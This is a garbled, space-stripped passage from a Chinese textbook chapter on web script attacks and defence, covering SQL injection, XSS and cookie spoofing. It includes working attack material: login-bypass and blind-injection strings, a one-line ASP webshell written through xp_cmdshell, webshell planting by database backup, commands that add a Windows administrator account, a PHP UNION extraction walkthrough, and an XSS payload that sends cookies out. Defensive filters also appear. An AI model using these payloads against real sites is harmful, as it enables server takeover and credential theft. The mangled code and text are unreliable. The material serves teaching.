網(wǎng)絡(luò)腳本攻擊與防御67

第五章腳本攻擊與防御dimrsadmin1=request("admin")password1=request("password")setrs=server.CreateObject("ADODB.RecordSet")rs.open"select*fromadminwhereadmin='"&admin1&"'andpassword='"&password1&"'",conn,1ifrs.eofandrs.bofthenresponse.write"<SCRIPTlanguage=JavaScript>alert('用戶(hù)名或密碼不正確！');"response.write"javascript:history.go(-1)</SCRIPT>"response.endelsesession("admin")=rs("admin")session("password")=rs("password")session("aleave")=rs("aleave")response.redirect"admin.asp"endifrs.closesetrs=nothing一個(gè)經(jīng)典的SQL注入漏洞分析在用戶(hù)名和密碼那里都填入‘OR‘’=’，SQL語(yǔ)句被構(gòu)造成 select*fromadminwhereadmin=‘'OR‘'=‘'

and

password=‘'OR‘'=‘‘意思是當(dāng)admin為空或者空等于空，password為空或者空等于空的時(shí)候整個(gè)查詢(xún)語(yǔ)句就為真。如何來(lái)修補(bǔ)漏洞？過(guò)濾掉其中的特殊字符。這里我們就過(guò)濾掉其中的單引號(hào)“'〞，即是把程序的頭兩行改為：admin1=replace(trim(request("admin")),"'","")password1=replace(trim(request("password")),"'","")判斷數(shù)據(jù)庫(kù)的類(lèi)型效勞器的IIS錯(cuò)誤提示沒(méi)關(guān)閉提交://localhost/test/onews.asp?id=37’：1、如果是Access數(shù)據(jù)庫(kù)，那么應(yīng)該返回：MicrosoftJETDatabaseEngine錯(cuò)誤'80040e14'字符串的語(yǔ)法錯(cuò)誤在查詢(xún)表達(dá)式'id=37''中。/onews.asp，行82、如果是SQLServer數(shù)據(jù)庫(kù)，那么應(yīng)該返回：MicrosoftOLEDBProviderforODBCDrivers錯(cuò)誤'80040e14'[Microsoft][ODBCSQLServerDriver][SQLServer]字符串''之前有未閉合的引號(hào)。/onews.asp，行8效勞器的IIS錯(cuò)誤提示關(guān)閉了 根據(jù)Access和SQLServer自己的系統(tǒng)表來(lái)區(qū)分。Access是在系統(tǒng)表[msysobjects]中，但在Web環(huán)境下讀該表會(huì)提示“沒(méi)有權(quán)限〞，SQLServer是在表[sysobjects]中，在Web環(huán)境下可正常讀取。 提交：://localhost/test/onews.asp?id=37and(selectcount(*)fromsysobjects)>0如果是Access數(shù)據(jù)庫(kù)，因?yàn)椴淮嬖趕ysobjects表，所以返回結(jié)果應(yīng)該和正常頁(yè)面有很大區(qū)別；如果是SQLServer，那么應(yīng)該返回一個(gè)查詢(xún)成功的正常頁(yè)面。1.1Access數(shù)據(jù)庫(kù)的注入把IE菜單=>工具=>Internet選項(xiàng)=>高級(jí)=>顯示友好HTTP錯(cuò)誤信息前面的勾去掉，這樣可以顯示出現(xiàn)的錯(cuò)誤信息。分析一次完整的SQL注入。<%owen=request("id")

Setrsnews=Server.CreateObject("ADODB.RecordSet")sql="updatenewssethits=hits+1whereid="&cstr(request("id"))conn.executesqlsql="select*fromnewswhereid="&owenrsnews.Opensql,conn,1,1title=rsnews("title")ifrsnews.eofandrsnews.bofthenresponse.Write("數(shù)據(jù)庫(kù)出錯(cuò)")else%>://localhost/test/onews.asp?id=37://localhost/test/onews.asp?id=37and1=2 sql=select*fromnewswhereid=37and1=2://localhost/test/onews.asp?id=37and1=1://localhost/test/onews.asp?id=37and0<>(selectcount(*)fromadmin) 猜測(cè)是否存在admin表://localhost/test/onews.asp?id=37and1=(selectcount(*)fromadminwherelen(pass)>0)猜測(cè)是否存在pass字段://localhost/test/onews.asp?id=37and1=(selectcount(*)fromadminwherelen(password)>0)://localhost/test/onews.asp?id=37and(selectasc(mid(password,1,1))fromadmin)>100假設(shè)pssword字段中第一個(gè)記錄的第一位的ASCII碼大于100，如果假設(shè)正確那么應(yīng)該返回正常頁(yè)面猜測(cè)password字段是否存在防止SQL注入(1)在效勞端正式處理之前對(duì)提交數(shù)據(jù)的合法性進(jìn)行檢查；(2)封裝客戶(hù)端提交信息；(3)替換或刪除敏感字符/字符串；(4)屏蔽出錯(cuò)信息。第一種方法DimTc_Post,Tc_Get,Tc_In,Tc_Inf,Tc_Xh '定義需要過(guò)濾的字串Tc_In="'|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|or|char|declare"Tc_Inf=split(Tc_In,"|")'處理post數(shù)據(jù)IfRequest.Form<>""ThenForEachTc_PostInRequest.FormForTc_Xh=0ToUbound(Tc_Inf)IfInstr(LCase(Request.Form(Tc_Post)),Tc_Inf(Tc_Xh))<>0ThenResponse.Write"<ScriptLanguage=JavaScript>alert('請(qǐng)不要在參數(shù)中包含非法字符嘗試注入！');</Script>"'處理get數(shù)據(jù)IfRequest.QueryString<>""ThenForEachTc_GetInRequest.QueryStringForTc_Xh=0ToUbound(Tc_Inf)IfInstr(LCase(Request.QueryString(Tc_Get)),Tc_Inf(Tc_Xh))<>0ThenResponse.Write"<ScriptLanguage=JavaScript>alert('請(qǐng)不要在參數(shù)中包含非法字符嘗試注入！');</Script>"1.2SQLServer數(shù)據(jù)庫(kù)的注入判斷帳號(hào)的權(quán)限帳戶(hù)有三種不同的權(quán)限：Sa權(quán)限、Db_owner權(quán)限、Public權(quán)限://localhost/test/onews.asp?id=37;and(selectcount(*)fromsysobjects)>0and1=(selectIS_SRVROLEMEMBER(’sysadmin’));--

如果返回正常的話(huà)就說(shuō)明數(shù)據(jù)庫(kù)連接帳戶(hù)是Sa權(quán)限and1=(selectIS_MEMBER('db_owner'));--

如果返回正常的話(huà)就說(shuō)明數(shù)據(jù)庫(kù)連接帳戶(hù)就是db_owner權(quán)限Sa權(quán)限下的注入無(wú)法直接連接效勞器 取得webshell。 什么是webshell？ 所謂webshell就是一個(gè)asp或php木馬后門(mén)，黑客在入侵了一個(gè)網(wǎng)站后，常常在將這些asp或php木馬后門(mén)文件放置在網(wǎng)站效勞器的web目錄中，與正常的網(wǎng)頁(yè)文件混在一起。然后黑客就可以用web的方式，通過(guò)asp或php木馬后門(mén)控制網(wǎng)站效勞器，包括上傳下載文件、查看數(shù)據(jù)庫(kù)、執(zhí)行任意程序命令等。如何利用Sa權(quán)限取得webshell？可以利用對(duì)Access數(shù)據(jù)庫(kù)注入的方法，猜解管理員帳戶(hù)密碼，登陸后臺(tái)再通過(guò)上傳或者寫(xiě)入配置文件等方法得到webshell，如前介紹。找到web目錄直接用echo命令寫(xiě)入簡(jiǎn)單的asp木馬。找web目錄現(xiàn)在一般有讀取注冊(cè)表和遍歷目錄法，寫(xiě)入木馬是利用xp_cmdshell擴(kuò)展存儲(chǔ)執(zhí)行命令。假設(shè)web目錄為D:\WEB，具體語(yǔ)句如下： ;exec‘echo^<^%evalrequest(chr(35))%^>^>D:\WEB\tc.asp’;--一句話(huà)木馬db_owner權(quán)限下的注入直接獲取webshell的方法：獲取WEB路徑 在db_owner權(quán)限下要得到WEB路徑根本只有兩個(gè)方法：利用擴(kuò)展存儲(chǔ)過(guò)程xp_regread，只要有Public權(quán)限就可以運(yùn)行它。因?yàn)镮IS默認(rèn)的WEB路徑放在注冊(cè)表中，所以通過(guò)以下語(yǔ)句就可以讀取出來(lái)：;ExecHKEY_LOCAL_MACHINE,‘SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\’,‘/’利用擴(kuò)展存儲(chǔ)過(guò)程xp_dirtree。通過(guò)它可以列出指定目錄下所有的子目錄和文件。這個(gè)擴(kuò)展存儲(chǔ)過(guò)程同樣只需要Public權(quán)限就可以運(yùn)行它，它有三個(gè)參數(shù)，第一個(gè)參數(shù)是路徑，第二個(gè)是目錄深度，第三個(gè)表示是否列出文件。如果第三個(gè)參數(shù)為0，那么只列出目錄。方法一：首先建立一個(gè)臨時(shí)表把目標(biāo)盤(pán)下面的1級(jí)子目錄和文件插入到表中： ://localhost/XXX.asp?id=1;CREATETABLEtmp([ID]intIDENTITY(1,1)NOTNULL,[name][nvarchar](300)NOTNULL,[depth][int]NOTNULL,[isfile][nvarchar](50)NULL);insertintotmpexecmaster..xp_dirtree‘d:\’,1,1獲取第一條數(shù)據(jù)： ://localhost/XXX.asp?id=1and(selectnamefromtmpwhereid=1)>1這樣通過(guò)遞增ID就可以把所有目錄讀取出來(lái)，一定可以找出web目錄。方法二：第一步還是先創(chuàng)立臨時(shí)表，把目標(biāo)盤(pán)下面的所有子目錄和文件信息全部插入到表中： ://localhost/XXX.asp?id=1;CREATETABLEtmp([ID]intIDENTITY(1,1)NOTNULL,[name][nvarchar](300)NOTNULL,[depth][int]NOTNULL,[isfile][nvarchar](50)NULL);insertintotmpexecmaster..xp_dirtree‘d:\’,0,1第二步，直接測(cè)試D盤(pán)下是否有目標(biāo)文件“XXX.asp〞，提交如下語(yǔ)句： ://localhost/XXX.asp?id=1and(slecetstr(id)%2b’@’%2bstr(depth)%2b’@’fromtmpwherename=’XXX.asp’andisfile=1)>02.寫(xiě)入webshell通過(guò)備份數(shù)據(jù)庫(kù)來(lái)獲得webshell。原因：因?yàn)閍sp.dll處理ASP文件的時(shí)候，以“<%〞為開(kāi)頭，“%>〞標(biāo)記為結(jié)尾的語(yǔ)句都會(huì)當(dāng)作ASP語(yǔ)句執(zhí)行。如果先在數(shù)據(jù)庫(kù)之中插入構(gòu)造的ASP木馬語(yǔ)句，然后再把數(shù)據(jù)庫(kù)備份到磁盤(pán)，命名為“a.asp〞，就可以得到webshell了。采用增量備份的方法，語(yǔ)句如下：Createtablecmd(aimage)Backupdatabasedatatodisk=’E:\www\wwwroot\tc.bak’withinitinsertintocmd(a)value(‘<%executerequest(“1")%>’)Backupdatabasedatatodisk=’E:\www\wwwroot\shell.asp’withDIFFERENTIAL保護(hù)好SQLServer數(shù)據(jù)庫(kù)在數(shù)據(jù)沒(méi)有經(jīng)過(guò)效勞器處理之前就進(jìn)行嚴(yán)格的檢查刪除掉擴(kuò)展存儲(chǔ)usemasterEXECsp_dropextendedproc'xp_cmdshell'EXECsp_dropextendedproc'Sp_OACreate'EXECsp_dropextendedproc'Sp_OADestroy'EXECsp_dropextendedproc'Sp_OAGetErrorInfo'EXECsp_dropextendedproc'Sp_OAGetProperty'EXECsp_dropextendedproc'Sp_OAMethod'EXECsp_dropextendedproc'Sp_OASetProperty'EXECsp_dropextendedproc'Sp_OAStop'EXECsp_dropextendedproc'Xp_regaddmultistring'EXECsp_dropextendedproc'Xp_regdeletekey'EXECsp_dropextendedproc'Xp_regdeletevalue'EXECsp_dropextendedproc'Xp_regenumvalues'EXECsp_dropextendedproc'Xp_regread'EXECsp_dropextendedproc'Xp_regremovemultistring'EXECsp_dropextendedproc'Xp_regwrite'dropproceduresp_makewebtask刪除掉所對(duì)應(yīng)的dll文件，xplog70.dll盡量不采用SA權(quán)限連接數(shù)據(jù)庫(kù)注入過(guò)程中的一些常見(jiàn)問(wèn)題

關(guān)鍵存儲(chǔ)過(guò)程被刪除

首先嘗試恢復(fù)xp_cmdshell，提交如下語(yǔ)句：

sp_addextendedprocXp_cmdshell,@dllname='Xplog70.dll‘ 如果提示找不到Xplog70.dll文件，那就用webshell上傳Xplog70.dll到任意目錄，再執(zhí)行：

Exec'xp_cmdshell','C:\xplog70.dll'如果還是不成功，可以再?lài)L試加上SQL帳戶(hù)：execxxxexecxxx,sysadmin

然后用SQL查詢(xún)分析器連接上去再執(zhí)行：declare@cmdINTexecsp_oacreate'wscript.shell',@cmdoutputexecsp_oamethod@cmd,'run',null,'netuserxxx123456/add','0','true'declare@cmdINTexecsp_oacreate'wscript.shell',@cmdoutputexecsp_oamethod@cmd,'run',null,'netlocalgroupadministratorsxxx/add','0','true'2PHP注入PHP+MySQL注入的一些特征Version4以下的版本不支持子語(yǔ)句。Php.ini里的magic_quotes_gpc為on時(shí)，把提交的變量中所有的‘(單引號(hào)),“(雙引號(hào)),\(反斜線(xiàn))和空字符會(huì)自動(dòng)轉(zhuǎn)為含有反斜線(xiàn)的轉(zhuǎn)義字符，例如把’變成了\’,把\變成了\\。Php的mysql_query函數(shù)限制了只能查詢(xún)一個(gè)SQL語(yǔ)句，即適用分好把多個(gè)SQL語(yǔ)句組合到一起，實(shí)際上也只有第一個(gè)SQL語(yǔ)句會(huì)被執(zhí)行。環(huán)境探測(cè)是否支持〞--“注釋法，如果支持那么就是及以上版本，提交： ://localhost/user.php?username=abc--test利用order轉(zhuǎn)換判斷版本，提交： ://localhost/user.php?username=abcandord(mid(version(),1,1))>51/* 返回正常頁(yè)面說(shuō)明是及其以上版本。聯(lián)合查詢(xún)功能。如果version>4，可以使用聯(lián)合查詢(xún)來(lái)獲得精確的版本號(hào)，提交： ://localhost/user.php?username=abc’unionselect1,version(),3/*PHP注入過(guò)程1.判斷是否存在注入,加';and1=1;and1=22.判斷版本andord(mid(version(),1,1))>51/*返回正常說(shuō)明是4.0以上版本，可以用union查詢(xún)3.利用orderby暴字段，在網(wǎng)址后加orderby10/*如果返回正常說(shuō)明字段大于104.再利用union來(lái)查詢(xún)準(zhǔn)確字段，如:and1=2unionselect1,2,3,......./*直到返回正常，說(shuō)明猜到準(zhǔn)確字段數(shù)。如過(guò)濾了空格可以用/**/代替。5.判斷數(shù)據(jù)庫(kù)連接帳號(hào)有沒(méi)有寫(xiě)權(quán)限，and(selectcount(*)frommysql.user)>0/*如果結(jié)果返回錯(cuò)誤，那我們只能猜解管理員帳號(hào)和密碼了。6.如果返回正常，那么可以通過(guò)and1=2unionselect1,2,3,4,5,6,load_file(char(文件路徑的ascii值，用逗號(hào)隔開(kāi))),8,9,10/*注：load_file(char(文件路徑的ascii值，用逗號(hào)隔開(kāi)))也可以用十六進(jìn)制，通過(guò)這種方式讀取配置文件，找到數(shù)據(jù)庫(kù)連接等。7.首先猜解user表,如:and1=2unionselect1,2,3,4,5,6....fromuser/*如果返回正常，說(shuō)明存在這個(gè)表。8.知道了表就猜解字段,and1=2unionselect1,username,3,4,5,6....fromuser/*如果在2字段顯示出字段內(nèi)容那么存在些字段。9.同理再猜解password字段,猜解成功再找后臺(tái)登錄。10.登錄后臺(tái)，上傳shell。什么是跨站腳本攻擊？ 跨站腳本攻擊〔XSS，又稱(chēng)作CSS〕指的是惡意攻擊者向Web頁(yè)面里插入惡意html代碼，當(dāng)用戶(hù)瀏覽該頁(yè)之時(shí)，嵌入其中Web頁(yè)面的html代碼會(huì)被執(zhí)行，從而到達(dá)惡意用戶(hù)的特殊目的。屬于被動(dòng)攻擊。數(shù)據(jù)流程： 惡意用戶(hù)的Html輸入—>web程序—>進(jìn)入數(shù)據(jù)庫(kù)—>web程序—>用戶(hù)瀏覽器跨站Script攻擊方式動(dòng)態(tài)輸入大致有四種形式：URL參數(shù)表格元素Cookie數(shù)據(jù)請(qǐng)求javascript語(yǔ)言的知識(shí)

1:“alert()〞：顯示信息對(duì)話(huà)框的alert()方法,它生成的是一個(gè)獨(dú)立的小窗口,稱(chēng)作對(duì)話(huà)框,用來(lái)顯示一條信息和一個(gè)按鈕。2:“document.cookie〞：我們?cè)谔幚韈ookie時(shí),javascript將它保存為document對(duì)象的一個(gè)屬性,其屬性名稱(chēng)是cookie,利用這個(gè)屬性,我們可以創(chuàng)立和讀取cookie數(shù)據(jù),在程序中可以使用:“alert(document.cookie)〞調(diào)用當(dāng)前頁(yè)面的cookie數(shù)據(jù)項(xiàng)值.在我們啟動(dòng)瀏覽器翻開(kāi)頁(yè)面后,如果存在相應(yīng)的cookie,那么它被裝入到document對(duì)象的cookie屬性中,document.cookie屬性采用name=value對(duì)應(yīng)方式保存各個(gè)cookie數(shù)據(jù)項(xiàng)值.document(文檔)對(duì)象表示在瀏覽器里顯示的HTML(向頁(yè)面輸出數(shù)據(jù)),cookie屬性是允許讀寫(xiě)HTTP的cookie。3:escape()：它將字符串中所有的非字母字符轉(zhuǎn)換為用字母數(shù)字表示的等價(jià)字符串,具有編碼字符串的功能.一般情況下,cookie通常由效勞器端的程序通過(guò)HTTP請(qǐng)求和響應(yīng)頭發(fā)送給瀏覽器。跨站Script攻擊范例

1.Htm<formaction=tc.asp><inputtype=textname=asize=40><inputtype=submitvalue=提交></form>tc.asp<%str=request("a")response.writestr%>跨站盜取cookie

什么是cookie？Cookie，有時(shí)也用其復(fù)數(shù)形式Cookies，指某些網(wǎng)站為了區(qū)分用戶(hù)身份、進(jìn)行session跟蹤而儲(chǔ)存在用戶(hù)本地終端上的數(shù)據(jù)〔通常經(jīng)過(guò)加密〕。Cookie是由效勞器端生成，發(fā)送給User-Agent〔一般是瀏覽器〕，瀏覽器會(huì)將Cookie的key/value保存到某個(gè)目錄下的文本文件內(nèi)，下次請(qǐng)求同一網(wǎng)站時(shí)就發(fā)送該Cookie給效勞器〔前提是瀏覽器設(shè)置為啟用cookie〕。作用：效勞器可以利用Cookies包含信息的任意性來(lái)篩選并經(jīng)常性維護(hù)這些信息，以判斷在HTTP傳輸中的狀態(tài)。Logtc.asp<HTML><HEAD><%Ifrequest("login")="login"Then name=request("name")liuyan=request("liuyan")Response.Cookies("VisitorName")=Request.Form("name")EndIf%></HEAD><BODY><formaction="logtc.asp"method="post"><TABLEborder="1"width="52%"id="table1"cellpadding="0"><TR> <TD>用戶(hù)名</TD> <TD><inputtype="text"name="name"size="20"></TD></TR><TR> <TD>留言</TD> <TD><inputtype="text"name="liuyan"size="60"></TD></TR><tr><td><inputtype="submit"name="submit"value="提交"></td></tr><inputtype="hidden"name="login"value="login"><TR> <TD><%Response.write(name)%></TD> <TD><%Response.write(liuyan)%></TD></TR></TABLE></form></BODY></HTML>tc2.asp<%a=Request.ServerVariables("QUERY_STRING")testfile=Server.MapPath("cookie.txt")setfs=server.CreateObject("scripting.filesystemobject")setthisfile=fs.OpenTextFile(testfile,8,True,0)thisfile.Writeline(""&a&"")thisfile.closesetfs=nothing%>實(shí)例演示：Logtc.asp；tc2.asp輸入：<script>alert(document.cookie)</script>輸入：<script>window.open('://localhost/test/test2/tc2.asp?msg='+document.cookie)</script>跨站腳本攻擊的突破和限制1.首先提交<script>alert(“testforXSS〞)</script>，能彈出窗口，說(shuō)明跨站攻擊成功。解決方案1：過(guò)濾用戶(hù)提交的變量中的<和>，轉(zhuǎn)換成16進(jìn)制 str=replace(str,"<","<") str=replace(str,">",">")2.測(cè)試：javascript:alert("饒過(guò)第一個(gè)限制！")解決方案2：替換“:〞為“：〞 str=replace(str,":","：")3.測(cè)試：javascript:alert(“饒過(guò)第二個(gè)限制！〞)，:是“:〞的十進(jìn)制格式解決方案3：過(guò)濾ASC字符的轉(zhuǎn)換代碼“&〞 str=replace(str,"&","&")4.測(cè)試：#onerror=alert("再次饒過(guò)驗(yàn)證")解決方案4：破壞形成事件機(jī)制的條件，轉(zhuǎn)換掉提交過(guò)來(lái)的空格字符 str=replace(str,""," ")測(cè)試用例：1.htm，tc3.asp1.htm<formaction=tc3.asp><inputtype=textname=asize=40><inputtype=submitvalue=提交></form>tc3.asp<%str=request("a")str=replace(str,"<","<")str=replace(str,">",">")str=replace(str,":","：")str=replace(str,"&","&")str=replace(str,""," ")response.writestrresponse.write"<br>"response.write"<imgsrc="&str&"></img>"%>4利用cookie的攻擊Cookie文件名稱(chēng)格式： 你的用戶(hù)名@產(chǎn)生的COOKIE的網(wǎng)頁(yè)文件所在的WEB目錄[COOKIE改變的次數(shù)].txt

如：

ibm@baidu[1].txt設(shè)置cookie腳本

Set-Cookie:name=VALUE;

expires=DATE;

path=PATH;

domain=DOMAIN_NAME;4.1Cookie欺騙原理按照瀏覽器的約定，只有來(lái)自同一域名的cookie才可以讀寫(xiě)，而cookie只是瀏覽器的，對(duì)通訊協(xié)議無(wú)影響，所以要進(jìn)行cookie欺騙可以有多種途徑：１、跳過(guò)瀏覽器，直接對(duì)通訊數(shù)據(jù)改寫(xiě)２、修改瀏覽器，讓瀏覽器從本地可以讀寫(xiě)任意域名cookie３、使用簽名腳本，讓瀏覽器從本地可以讀寫(xiě)任意域名cookie〔有平安問(wèn)題〕４、欺騙瀏覽器，讓瀏覽器獲得假的域名

第四種方法思路首先構(gòu)造3個(gè)頁(yè)面：Admin1.htm〔效勞器正常頁(yè)面〕Level1.htm〔測(cè)試頁(yè)面〕Admin2.htm〔本機(jī)欺騙頁(yè)面〕Admin1.htm<scriptlanguage=vbs>document.cookie="level"&"="&"user"&";expires=Monday,01-Jan-0812:00:00GMT"msgboxdocument.cookie</script>Admin2.htm<scriptlanguage=vbs>document.cookie="level"&"="&"admin"&";expires=Monday,01-Jan-0812:00:00GMT"</script>Level1.htm<scriptlanguage=vbs> co=document.cookie le=mid(co,instr(co,"=")+1,len(co)-instr(co,"=")+1) ifle="user"then msgbox"youareauser" else ifle="admin"then msgbox"youareaadministrator" else